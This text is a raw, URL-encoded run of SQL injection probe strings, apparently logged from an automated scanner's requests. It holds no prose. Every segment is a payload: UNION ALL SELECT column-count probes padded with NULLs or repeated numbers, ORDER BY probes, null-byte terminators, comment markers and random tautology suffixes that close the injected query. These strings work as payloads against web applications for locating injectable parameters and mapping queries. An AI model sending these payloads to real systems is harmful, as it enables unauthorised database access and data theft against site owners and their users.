-3078%22%20UNION%20ALL%20SELECT%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923%2C%202923--%20%20AND%20%22HkFa%22%3D%22HkFa -8838%22%20UNION%20ALL%20SELECT%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885%2C%205885--%20%20AND%20%22Wenh%22%3D%22Wenh foo%22%20ORDER%20BY%201%00%20AND%20%22aKoV%22%3D%22aKoV foo%22%20ORDER%20BY%203789%00%20AND%20%22eIPm%22%3D%22eIPm foo%22%20UNION%20ALL%20SELECT%20NULL%00%20AND%20%22GzdH%22%3D%22GzdH foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20AND%20%22LHpO%22%3D%22LHpO foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22uYlw%22%3D%22uYlw foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22fgRd%22%3D%22fgRd foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22Ihkj%22%3D%22Ihkj foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22tcYZ%22%3D%22tcYZ foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22yjkm%22%3D%22yjkm foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22yIYS%22%3D%22yIYS foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22DsuT%22%3D%22DsuT foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22wRXn%22%3D%22wRXn -8882%22%20ORDER%20BY%201%00%20AND%20%22zoRc%22%3D%22zoRc -6571%22%20ORDER%20BY%202875%00%20AND%20%22tQhM%22%3D%22tQhM -5191%22%20UNION%20ALL%20SELECT%207101%00%20AND%20%22fIYM%22%3D%22fIYM -6917%22%20UNION%20ALL%20SELECT%201947%2C%201947%00%20AND%20%22nHbR%22%3D%22nHbR -7979%22%20UNION%20ALL%20SELECT%209738%2C%209738%2C%209738%00%20AND%20%22SlaZ%22%3D%22SlaZ -5959%22%20UNION%20ALL%20SELECT%206504%2C%206504%2C%206504%2C%206504%00%20AND%20%22txbc%22%3D%22txbc -5663%22%20UNION%20ALL%20SELECT%204296%2C%204296%2C%204296%2C%204296%2C%204296%00%20AND%20%22svul%22%3D%22svul -5025%22%20UNION%20ALL%20SELECT%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%00%20AND%20%22kcDv%22%3D%22kcDv -1779%22%20UNION%20ALL%20SELECT%205078%2C%205078%2C%205078%2C%205078%2C%205078%2C%205078%2C%205078%00%20AND%20%22xdix%22%3D%22xdix -3847%22%20UNION%20ALL%20SELECT%203033%2C%203033%2C%203033%2C%203033%2C%203033%2C%203033%2C%203033%2C%203033%00%20AND%20%22IWxd%22%3D%22IWxd -7106%22%20UNION%20ALL%20SELECT%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%00%20AND%20%22ALMm%22%3D%22ALMm -4727%22%20UNION%20ALL%20SELECT%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%00%20AND%20%22HQab%22%3D%22HQab foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22hEHz%22%3D%22hEHz foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22FRct%22%3D%22FRct foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22mVXl%22%3D%22mVXl foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22JJNj%22%3D%22JJNj foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22mCji%22%3D%22mCji foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22hVsC%22%3D%22hVsC foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ieqh%22%3D%22ieqh foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22IoHF%22%3D%22IoHF foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22JkEB%22%3D%22JkEB foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22mwxg%22%3D%22mwxg -6138%22%20UNION%20ALL%20SELECT%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%00%20AND%20%22XRVR%22%3D%22XRVR -9393%22%20UNION%20ALL%20SELECT%204690%2C%204690%2C%204690%2C%204690%2C%204690%2C%204690%2C%204690%2C%204690%2C%204690%2C%204690%2C%204690%2C%204690%00%20AND%20%22wKtu%22%3D%22wKtu -2538%22%20UNION%20ALL%20SELECT%209683%2C%209683%2C%209683%2C%209683%2C%209683%2C%209683%2C%209683%2C%209683%2C%209683%2C%209683%2C%209683%2C%209683%2C%209683%00%20AND%20%22LjSU%22%3D%22LjSU -9075%22%20UNION%20ALL%20SELECT%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%00%20AND%20%22uaNs%22%3D%22uaNs -6300%22%20UNION%20ALL%20SELECT%201815%2C%201815%2C%201815%2C%201815%2C%201815%2C%201815%2C%201815%2C%201815%2C%201815%2C%201815%2C%201815%2C%201815%2C%201815%2C%201815%2C%201815%00%20AND%20%22kNAn%22%3D%22kNAn -5772%22%20UNION%20ALL%20SELECT%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%2C%201950%00%20AND%20%22UWVf%22%3D%22UWVf -3352%22%20UNION%20ALL%20SELECT%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%00%20AND%20%22Fqbo%22%3D%22Fqbo -3352%22%20UNION%20ALL%20SELECT%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%00%20AND%20%22VUpi%22%3D%22VUpi -8567%22%20UNION%20ALL%20SELECT%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%00%20AND%20%22lPqH%22%3D%22lPqH -9290%22%20UNION%20ALL%20SELECT%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%00%20AND%20%22SXCD%22%3D%22SXCD foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22skeK%22%3D%22skeK foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22sCUV%22%3D%22sCUV foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22sITs%22%3D%22sITs foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22xBhD%22%3D%22xBhD foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22MCWD%22%3D%22MCWD foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22PXCu%22%3D%22PXCu foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22eveZ%22%3D%22eveZ foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22VFmX%22%3D%22VFmX foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22YABR%22%3D%22YABR foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22jPDS%22%3D%22jPDS -7824%22%20UNION%20ALL%20SELECT%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%00%20AND%20%22TeQf%22%3D%22TeQf -5849%22%20UNION%20ALL%20SELECT%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%00%20AND%20%22eVIF%22%3D%22eVIF -9389%22%20UNION%20ALL%20SELECT%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%00%20AND%20%22uTzd%22%3D%22uTzd -8552%22%20UNION%20ALL%20SELECT%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%00%20AND%20%22CgqF%22%3D%22CgqF -2597%22%20UNION%20ALL%20SELECT%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%2C%204663%00%20AND%20%22LhZh%22%3D%22LhZh -3182%22%20UNION%20ALL%20SELECT%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%00%20AND%20%22jkSv%22%3D%22jkSv -1888%22%20UNION%20ALL%20SELECT%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%00%20AND%20%22HCyv%22%3D%22HCyv -4201%22%20UNION%20ALL%20SELECT%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%00%20AND%20%22cxkl%22%3D%22cxkl -4251%22%20UNION%20ALL%20SELECT%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%00%20AND%20%22KqTl%22%3D%22KqTl -1796%22%20UNION%20ALL%20SELECT%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%00%20AND%20%22xHhw%22%3D%22xHhw foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22rksj%22%3D%22rksj foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22YAxo%22%3D%22YAxo foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22kzYG%22%3D%22kzYG foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22FYkt%22%3D%22FYkt foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22OIXd%22%3D%22OIXd foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22oXxf%22%3D%22oXxf foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22aesi%22%3D%22aesi foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22Kzit%22%3D%22Kzit foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22XggP%22%3D%22XggP foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22Vdhp%22%3D%22Vdhp -1766%22%20UNION%20ALL%20SELECT%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%2C%209875%00%20AND%20%22VBLH%22%3D%22VBLH -9427%22%20UNION%20ALL%20SELECT%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%00%20AND%20%22ndZv%22%3D%22ndZv -5782%22%20UNION%20ALL%20SELECT%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%00%20AND%20%22PxAS%22%3D%22PxAS -5911%22%20UNION%20ALL%20SELECT%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%2C%202936%00%20AND%20%22luVK%22%3D%22luVK -7932%22%20UNION%20ALL%20SELECT%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%2C%204535%00%20AND%20%22DItY%22%3D%22DItY -8844%22%20UNION%20ALL%20SELECT%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%2C%201062%00%20AND%20%22ZDSA%22%3D%22ZDSA -7792%22%20UNION%20ALL%20SELECT%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%00%20AND%20%22Hjhh%22%3D%22Hjhh 